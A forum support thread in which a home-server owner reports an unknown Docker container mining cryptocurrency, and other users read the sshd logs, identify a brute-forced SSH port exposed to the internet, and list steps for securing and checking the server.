Unknown docker container installed


Recommended Posts

An unknown docker container named "modest_ardinghelli" was installed and pinned my server.  I believe it was mining. I'm obviously concerned with how it got there. My server is not open to the internet. Any tips on how to secure things and prevent this from happening again would be appreciated.

 

Attached is the log I pulled from the docker.

unknown docker log.txt

Edited by ihaveskittles
Was not finished with post.
Link to comment
6 hours ago, ihaveskittles said:

My server is not open to the internet

You've forwarded the access port for ssh directly to the internet (or have the server within a DMZ)

Mar 17 20:48:05 TheAbyss sshd[9160]: Accepted none for adm from 109.236.89.61 port 41065 ssh2
Mar 17 20:48:06 TheAbyss sshd[9162]: error: connect to 2a00:1450:400e:80b::200e port 80 failed: Network is unreachable
Mar 17 20:48:58 TheAbyss sshd[3933]: error: connect_to whois.tucows.com port 19954: failed.
Mar 17 20:49:47 TheAbyss sshd[9729]: Accepted none for adm from 194.88.107.165 port 36616 ssh2
Mar 17 20:49:48 TheAbyss sshd[9731]: error: connect to 2a00:1148:db00:0:b0b0::1 port 80 failed: Network is unreachable
Mar 17 20:50:50 TheAbyss sshd[10144]: Accepted none for root from 49.88.112.118 port 64282 ssh2
Mar 17 20:50:50 TheAbyss sshd[10144]: Received disconnect from 49.88.112.118 port 64282:11: 
Mar 17 20:50:50 TheAbyss sshd[10144]: Disconnected from user root 49.88.112.118 port 64282

And on and on...  Only a matter of time.

Link to comment

What Squid said. Your logs are full of thousands of attempts to SSH (and sometimes Telnet) into your server. Looks like it was a successful bruteforce attempt via a botnet.

 

Also you're right about the container, it's mining Monero.

 

Not comprehensive and there's probably some better guides out there but just some suggestions based on your situation:

  1. Now that you know it's not isolated, make sure you isolate the server from the internet. Whether that takes putting it behind a router or (if it already is) disabling port forwarding to SSH this is the main reason you were compromised
  2. Change your root password, someone knows it
  3. Update to 6.9.1 unless you're holding off for a reason
  4. Enable HTTPS on your Unraid instance if you haven't already to prevent your root password being leaked to your network if you log in via a web browser. I'd still do this even if you trust the security of the devices on your local network, because you never really know.
  5. Be extremely cautious in both the short and long term and check your configuration and data for signs of manipulation. If someone has been able to ssh into your root account and add a docker container, they could have done just about anything. Restarting Unraid after the event could hide the signs of it. You can do this using something like ClamAV but I'd also recommend going through it by hand. Keep in mind that recent modified dates / created dates can be manipulated.
  6. Check /boot/config/go for anything you didn't put in there, it doesn't look like this was an Unraid server specific attack but this is the most obvious file someone would use to set up persistent key based (to get around password changes) ssh access. Once your server is no longer exposed to the internet, it shouldn't be an issue anyway, but just to be safe.
  7. If you haven't yet / don't want to restart your server, delete /boot/config/ssh/authorized_keys to reset authorised ssh keys (used for password-less SSH login)

  8. Really just a comfort thing: If you're on a dynamic IP and don't use a dynamic DNS service, get a new IP from your ISP to (at least temporarily) stop the constant attempts. If you are using a dynamic DNS service, keep in mind that you're currently a target and it might be best to change your address. If you're on a static IP, like I said it's really just for comfort anyway because, to reiterate, once the ssh service is no longer exposed no one should be able to remotely ssh into your server
  9. Never port forward to port 22. If you need external ssh access, change it to another port. A lot of malicious scripts just scan a list of IPs to see which have port 22 open and then try to bruteforce their way in, most likely this is what happened to you. 
  10. Also, keep an eye out for unexpected traffic from your server. There's a real possibility it's part of the botnet now. 
Edited by lnxd
Link to comment
11 minutes ago, trurl said:

If you need to access your server outside your LAN use VPN. Wireguard VPN is built-in, just install the plugin and see its Support thread. 

Great point. I recently changed to Wireguard from passwordless ssh and it’s super easy with that plugin.

  • Like 1
Link to comment

Thanks for the replies. They were most helpful.

 

For the curious, I know how my server became vulnerable. About three weeks ago I had a major network issue (it completely broke) and long story short I ended up removing my firewall (Ubiquiti USG), because it stopped working. I saw this as an opportunity to install pfSense onto my server as a VM. However, life, work, and health kept me from completing this in a timely manner. Now four days ago I got my server back online (was offline) in preparation to install pfSense, in the hope of upcoming free time, and yesterday is when my server was breached. Apparently, I never turned the firewall from my ISP modem back on. 

 

To conclude, the rest of my devices on my network are fine, the network is secure again, IP address changed, and looking forward to combing through my server, connecting it back to the network and installing pfSense. 

  • Like 2
Link to comment

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.